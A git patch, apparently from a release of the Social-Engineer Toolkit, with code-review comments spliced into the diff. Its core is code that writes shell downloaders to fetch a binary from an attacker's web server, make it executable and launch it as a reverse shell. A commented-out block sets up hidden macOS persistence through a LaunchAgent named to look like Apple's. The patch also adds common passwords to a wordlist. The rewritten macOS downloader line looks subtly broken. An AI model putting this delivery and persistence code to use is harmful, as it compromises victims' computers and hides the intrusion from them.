From 74ee6a6fa454cfcbb3661d1dc65b41748c4d96ad Mon Sep 17 00:00:00 2001
From: TrustedSec
Date: Wed, 21 Aug 2013 17:40:05 -0400
Subject: [PATCH] SET version 5.3.3 release - many bug fixes

---
 config/set_config | 4 +++
 readme/CHANGES | 8 +++++
 src/core/payloadprep.py | 71 ++++++++++++++++++++++++++++++++++----
 src/fasttrack/wordlist.txt | 3 ++
 4 files changed, 80 insertions(+), 6 deletions(-)

diff --git a/config/set_config b/config/set_config
index 9fd5859c4..7f991c199 100644
--- a/config/set_config
+++ b/config/set_config
@@ -247,6 +247,10 @@ LINUX_PAYLOAD_DELIVERY=linux/x86/meterpreter/reverse_tcp
 ### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
 CUSTOM_LINUX_OSX_PAYLOAD=OFF
 #
+#
+### THIS WILL USE A CUSTOM PLIST FOR PERSISTENCE ON OSX
+ENABLE_PERSISTENCE_OSX=OFF
+#
 ### User agent string for when using anything that clones the website, this user agent will be used
 USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
 #
diff --git a/readme/CHANGES b/readme/CHANGES
index e21243a95..17f6da24c 100644
--- a/readme/CHANGES
+++ b/readme/CHANGES
@@ -1,3 +1,11 @@
+~~~~~~~~~~~~~~~~
+version 5.3.3
+~~~~~~~~~~~~~~~~
+
+* fixed an issue that would cause the download to randomized name to work properly on OSX
+* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
+* added better stability for osx exploitation
+
 ~~~~~~~~~~~~~~~~
 version 5.3.2
 ~~~~~~~~~~~~~~~~
diff --git a/src/core/payloadprep.py b/src/core/payloadprep.py
index aa9b806b8..7418a95ea 100644
--- a/src/core/payloadprep.py
+++ b/src/core/payloadprep.py
@@ -1,9 +1,7 @@
 #!/usr/bin/python
 ############################################
-#
 # Code behind the SET interactive shell
 # and RATTE
-#
 ############################################
 import os
 import sys
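Review bot: The comment added above `ENABLE_PERSISTENCE_OSX=OFF` in config/set_config presents the toggle as working, but the only code in this patch that reads it (the `check_config("ENABLE_PERSISTENCE_OSX=")` branch in src/core/payloadprep.py) prints `Coming soon..` and everything else behind it is commented out, so a user who sets it to ON gets neither the feature nor a warning. State that in the config itself, e.g. `### OSX PERSISTENCE VIA LAUNCHAGENT PLIST - NOT YET IMPLEMENTED, SETTING THIS TO ON CURRENTLY HAS NO EFFECT`, or leave the option out of set_config until the feature ships. A stale flag that is documented as live misleads both operators and anyone auditing the configuration.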
@@ -168,17 +166,78 @@ if posix == True:
 payload_flags = webserver.split(" ")
 # grab osx binary name
 osx_name = generate_random_string(10,10)
- downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
- filewrite.write(downloader)
+ downloader = "#!/bin/sh\ncurl -C -O http://%s/%s > /tmp/%s\nchmod +x /tmp/%s\n./tmp/%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
+ filewrite.write(downloader + "\n")
+ persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
+ if persistence == "on":
+ print "Coming soon.."
+ # modified persistence osx from http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
+ #filewrite.write(r"mkdir ~/Library/.hidden")
+ #filewrite.write("\n")
+ #filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
+ #filewrite.write("\n")
+ #filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" % (osx_name, payload_flags[1], payload_flags[2]))
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
+ #filewrite.write("\n")
+ #filewrite.write(r"mkdir ~/Library/LaunchAgents")
+ #filewrite.write("\n")
+ #filewrite.write("echo '' > ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'Label' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'com.apples.services' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'ProgramArguments' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> 
~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '/bin/sh' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write("echo ''$HOME'/Library/.hidden/connect.sh' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'RunAtLoad' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'StartInterval' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '60' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo 'AbandonProcessGroup' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"echo '' >> ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
+ #filewrite.write("\n")
+ #filewrite.write(r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
 filewrite.close()
 # grab nix binary name
+ #linux_name = check_options("NIX.BIN=")
 linux_name = generate_random_string(10,10)
 downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
 filewrite = file(setdir + "/web_clone/nix.bin", "w")
 filewrite.write(downloader)
 filewrite.close()
- shutil.copyfile("src/payloads/set_payloads/shell.osx", 
setdir + "/web_clone/%s" % (osx_name))
- shutil.copyfile("src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
+ shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
+ shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
+
+ # copy over the downloader scripts
+ osx_down = check_options("MAC.BIN=")
+ lin_down = check_options("NIX.BIN=")
+ shutil.copyfile(setdir + "/web_clone/nix.bin", setdir + "/web_clone/%s" % (lin_down))
+ shutil.copyfile(setdir + "/web_clone/mac.bin", setdir + "/web_clone/%s" % (osx_down))
 
 # check to see if we are using a staged approach or direct shell
 stager = check_config("SET_SHELL_STAGER=").lower()
diff --git a/src/fasttrack/wordlist.txt b/src/fasttrack/wordlist.txt
index 3d32baa73..a73c482bb 100644
--- a/src/fasttrack/wordlist.txt
+++ b/src/fasttrack/wordlist.txt
@@ -1,3 +1,6 @@
+default
+test
+testing
 password2
 password
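Review bot: The `if persistence == "on":` branch added near the top of the hunk is a placeholder `print "Coming soon.."` followed by roughly sixty commented-out `filewrite.write(...)` lines; commented-out code drifts from the live code and is already preserved in git history, so drop the block, keep at most a one-line `# TODO: OSX persistence not implemented` marker, and have the branch print an explicit "not implemented, option ignored" message instead of "Coming soon..". The new copy lines at the end of the hunk feed `check_options("MAC.BIN=")` and `check_options("NIX.BIN=")` straight into `shutil.copyfile` destinations; if `check_options` can return an empty string for an unset option, the destination collapses to the `web_clone/` directory itself and `copyfile` raises with an unhelpful traceback, so a guard such as `if not (osx_down and lin_down): raise ValueError("MAC.BIN/NIX.BIN not set")` would make that failure visible — I cannot confirm the return contract of `check_options` from this hunk. The copy also reads `setdir + "/web_clone/mac.bin"`, whose `filewrite` handle is opened above the hunk; the enclosing `if posix == True:` block starts and ends outside the hunk.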